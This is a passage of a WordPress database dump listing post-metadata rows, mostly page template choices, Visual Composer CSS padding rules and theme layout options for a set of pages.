!important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(45856,3072,'_wp_page_template','full-width.php'),(45857,3072,'slide_template','default'),(45858,3072,'_wpb_vc_js_status','true'),(45859,3072,'mkdf_page_content_behind_header_meta','no'),(45860,3072,'mkdf_disable_vertical_header_background_image_meta','no'),(45861,3072,'mkdf_disable_header_widget_areas_meta','no'),(45862,3072,'mkdf_page_content_padding','100px 0 90px'),(45863,3072,'_dp_original','1297'),(45864,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45865,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(45866,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45867,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45868,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45869,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45870,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(45871,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(45872,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(45873,1382,'_wp_page_template','full-width.php'),(45874,1382,'slide_template','default'),(45875,1382,'_wpb_vc_js_status','true'),(45876,1382,'mkdf_page_content_behind_header_meta','no'),(45877,1382,'mkdf_disable_vertical_header_background_image_meta','no'),(45878,1382,'mkdf_disable_header_widget_areas_meta','no'),(45879,1382,'mkdf_page_content_padding','120px 0 100px'),(45880,1382,'_dp_original','1297'),(45881,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45882,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45883,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45884,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45885,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45886,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45887,1393,'_wp_page_template','full-width.php'),(45888,1393,'slide_template','default'),(45889,1393,'_wpb_vc_js_status','true'),(45890,1393,'mkdf_page_content_behind_header_meta','no'),(45891,1393,'mkdf_disable_vertical_header_background_image_meta','no'),(45892,1393,'mkdf_disable_header_widget_areas_meta','no'),(45893,1393,'mkdf_page_content_padding','120px 0 110px'),(45894,1393,'_dp_original','1382'),(45895,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45896,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(45897,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45898,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45899,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45900,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45901,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(45902,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(45903,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(45904,1642,'_wp_page_template','full-width.php'),(45905,1642,'slide_template','default'),(45906,1642,'_wpb_vc_js_status','true'),(45907,1642,'mkdf_page_content_behind_header_meta','no'),(45908,1642,'mkdf_disable_vertical_header_background_image_meta','no'),(45909,1642,'mkdf_disable_header_widget_areas_meta','no'),(45910,1642,'mkdf_page_content_padding','120px 0'),(45911,1642,'_dp_original','1297'),(45912,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45913,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45914,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45915,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45916,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45917,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45918,1650,'_wp_page_template','full-width.php'),(45919,1650,'slide_template','default'),(45920,1650,'_wpb_vc_js_status','true'),(45921,1650,'mkdf_page_content_behind_header_meta','no'),(45922,1650,'mkdf_disable_vertical_header_background_image_meta','no'),(45923,1650,'mkdf_disable_header_widget_areas_meta','no'),(45924,1650,'mkdf_page_content_padding','30px 0'),(45925,1650,'_dp_original','1642'),(45926,1650,'_wpb_shortcodes_custom_css','.vc_custom_1534518584017{padding-top: 30px !important;}'),(45927,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45928,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45929,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45930,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45931,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45932,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45933,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45934,1658,'_wp_page_template','full-width.php'),(45935,1658,'slide_template','default'),(45936,1658,'_wpb_vc_js_status','true'),(45937,1658,'mkdf_page_content_behind_header_meta','no'),(45938,1658,'mkdf_disable_vertical_header_background_image_meta','no'),(45939,1658,'mkdf_disable_header_widget_areas_meta','no'),(45940,1658,'mkdf_page_content_padding','120px 0'),(45941,1658,'_dp_original','1650'),(45942,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45943,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45944,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45945,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45946,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45947,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45948,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45949,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45950,1662,'_wp_page_template','full-width.php'),(45951,1662,'slide_template','default'),(45952,1662,'_wpb_vc_js_status','true'),(45953,1662,'mkdf_page_content_behind_header_meta','no'),(45954,1662,'mkdf_disable_vertical_header_background_image_meta','no'),(45955,1662,'mkdf_disable_header_widget_areas_meta','no'),(45956,1662,'mkdf_page_content_padding','120px 0 105px'),(45957,1662,'_dp_original','1658'),(45958,1679,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45959,1679,'_wp_page_template','blog-standard'),(45960,1679,'slide_template','default'),(45961,1679,'_wpb_vc_js_status','false'),(45962,1679,'mkdf_page_content_behind_header_meta','no'),(45963,1679,'mkdf_blog_category_meta','recepies'),(45964,1679,'mkdf_show_posts_per_page_meta','5'),(45965,1679,'mkdf_sidebar_layout_meta','sidebar-25-right'),(45966,1679,'mkdf_disable_vertical_header_background_image_meta','no'),(45967,1679,'mkdf_disable_header_widget_areas_meta','no'),(45968,1679,'mkdf_page_content_padding','120px 0 100px'),(45969,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45970,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(45971,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45972,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45973,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45974,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45975,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(45976,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(45977,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(45978,1722,'_wp_page_template','full-width.php'),(45979,1722,'slide_template','default'),(45980,1722,'_wpb_vc_js_status','true'),(45981,1722,'mkdf_page_content_behind_header_meta','no'),(45982,1722,'mkdf_disable_vertical_header_background_image_meta','no'),(45983,1722,'mkdf_disable_header_widget_areas_meta','no'),(45984,1722,'mkdf_page_content_padding','0'),(45985,1722,'_dp_original','1297'),(45986,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45987,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(45988,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45989,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45990,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45991,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45992,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45993,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(45994,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(45995,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(45996,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(45997,1734,'_wp_page_template','full-width.php'),(45998,1734,'slide_template','default'),(45999,1734,'_wpb_vc_js_status','true'),(46000,1734,'mkdf_page_content_behind_header_meta','no'),(46001,1734,'mkdf_disable_vertical_header_background_image_meta','no'),(46002,1734,'mkdf_disable_header_widget_areas_meta','no'),(46003,1734,'mkdf_page_content_padding','0'),(46004,1734,'_dp_original','1722'),(46005,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46006,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46007,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46008,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46009,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46010,1742,'_wp_page_template','full-width.php'),(46011,1742,'slide_template','default'),(46012,1742,'_wpb_vc_js_status','true'),(46013,1742,'mkdf_page_content_behind_header_meta','no'),(46014,1742,'mkdf_disable_vertical_header_background_image_meta','no'),(46015,1742,'mkdf_disable_header_widget_areas_meta','no'),(46016,1742,'mkdf_page_content_padding','120px 0 0'),(46017,1742,'_dp_original','1297'),(46018,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46019,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46020,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46021,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46022,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46023,3073,'_wp_page_template','full-width.php'),(46024,3073,'slide_template','default'),(46025,3073,'_wpb_vc_js_status','true'),(46026,3073,'mkdf_page_content_behind_header_meta','no'),(46027,3073,'mkdf_disable_vertical_header_background_image_meta','no'),(46028,3073,'mkdf_disable_header_widget_areas_meta','no'),(46029,3073,'mkdf_page_content_padding','110px 0 120px'),(46030,3073,'_dp_original','1297'),(46031,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46032,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(46033,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46034,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46035,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46036,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46037,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46038,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46039,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(46040,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(46041,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(46042,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(46043,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(46044,1804,'_wp_page_template','full-width.php'),(46045,1804,'slide_template','default'),(46046,1804,'_wpb_vc_js_status','true'),(46047,1804,'mkdf_page_content_behind_header_meta','no'),(46048,1804,'mkdf_disable_vertical_header_background_image_meta','no'),(46049,1804,'mkdf_disable_header_widget_areas_meta','no'),(46050,1804,'mkdf_page_content_padding','120px 0 70px'),(46051,1804,'_dp_original','1734'),(46052,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46053,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46054,1805,'_wp_page_template','full-width.php'),(46055,1805,'slide_template','default'),(46056,1805,'_wpb_vc_js_status','true'),(46057,1805,'mkdf_page_content_behind_header_meta','no'),(46058,1805,'mkdf_page_content_padding','0 0 0 0'),(46059,1805,'mkdf_page_content_padding_mobile','0 0 0 0'),(46060,1805,'mkdf_header_type_meta','header-minimal'),(46061,1805,'mkdf_disable_vertical_header_background_image_meta','no'),(46062,1805,'mkdf_disable_header_widget_areas_meta','no'),(46063,1805,'mkdf_show_title_area_meta','no'),(46064,1805,'mkdf_disable_footer_meta','yes'),(46065,1805,'_dp_original','569'),(46066,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46067,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46068,1811,'_wp_page_template','full-width.php'),(46069,1811,'slide_template','default'),(46070,1811,'_wpb_vc_js_status','true'),(46071,1811,'mkdf_page_content_behind_header_meta','no'),(46072,1811,'mkdf_page_content_padding','0 0 0 0 '),(46073,1811,'mkdf_page_content_padding_mobile','0 0 0 0'),(46074,1811,'mkdf_set_menu_area_position_meta','center'),(46075,1811,'mkdf_disable_vertical_header_background_image_meta','no'),(46076,1811,'mkdf_menu_area_background_color_meta','#ffffff'),(46077,1811,'mkdf_menu_area_background_transparency_meta','40%'),(46078,1811,'mkdf_disable_header_widget_areas_meta','no'),(46079,1811,'mkdf_show_title_area_meta','no'),(46080,1811,'mkdf_disable_footer_meta','yes'),(46081,1811,'mkdf_header_type_meta','header-standard'),(46082,1811,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(46083,1811,'mkdf_header_behaviour_meta','no-behavior'),(46084,1811,'_dp_original','1008'),(46085,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46086,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46087,1819,'_wp_page_template','default'),(46088,1819,'slide_template','default'),(46089,1819,'_wpb_vc_js_status','true'),(46090,1819,'mkdf_page_content_behind_header_meta','no'),(46091,1819,'mkdf_disable_vertical_header_background_image_meta','no'),(46092,1819,'mkdf_disable_header_widget_areas_meta','no'),(46093,1819,'mkdf_show_title_area_meta','no'),(46094,1819,'mkdf_disable_footer_meta','yes'),(46095,1819,'mkdf_menu_area_in_grid_meta','yes'),(46096,1819,'mkdf_header_type_meta','header-minimal'),(46097,1819,'mkdf_page_content_padding','0 0 0 0'),(46098,1819,'mkdf_page_content_padding_mobile','0 0 0 0'),(46099,1819,'_dp_original','610'),(46100,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46101,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(46102,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46103,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46104,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46105,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46106,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46107,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46108,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46109,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(46110,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(46111,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(46112,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(46113,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(46114,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(46115,1827,'_wp_page_template','full-width.php'),(46116,1827,'slide_template','default'),(46117,1827,'_wpb_vc_js_status','true'),(46118,1827,'mkdf_page_content_behind_header_meta','no'),(46119,1827,'mkdf_disable_vertical_header_background_image_meta','no'),(46120,1827,'mkdf_disable_header_widget_areas_meta','no'),(46121,1827,'mkdf_page_content_padding','120px 0 100px'),(46122,1827,'_dp_original','1804'),(46123,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46124,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46125,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46126,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46127,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46128,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46129,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46130,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46131,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46132,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46133,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46134,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46135,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46136,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46137,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46138,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46139,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(46140,1836,'_wp_page_template','full-width.php'),(46141,1836,'slide_template','default'),(46142,1836,'_wpb_vc_js_status','true'),(46143,1836,'mkdf_page_content_behind_header_meta','no'),(46144,1836,'mkdf_disable_vertical_header_background_image_meta','no'),(46145,1836,'mkdf_disable_header_widget_areas_meta','no'),(46146,1836,'mkdf_page_content_padding','120px 0 140px'),(46147,1836,'_dp_original','1827'),(46148,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46149,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46150,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46151,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46152,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46153,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46154,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46155,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46156,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46157,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46158,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46159,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46160,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46161,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46162,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46163,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46164,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46165,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46166,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(46167,1852,'_wp_page_template','full-width.php'),(46168,1852,'slide_template','default'),(46169,1852,'_wpb_vc_js_status','true'),(46170,1852,'mkdf_page_content_behind_header_meta','no'),(46171,1852,'mkdf_disable_vertical_header_background_image_meta','no'),(46172,1852,'mkdf_disable_header_widget_areas_meta','no'),(46173,1852,'mkdf_page_content_padding','0'),(46174,1852,'_dp_original','1836'),(46175,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46176,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px 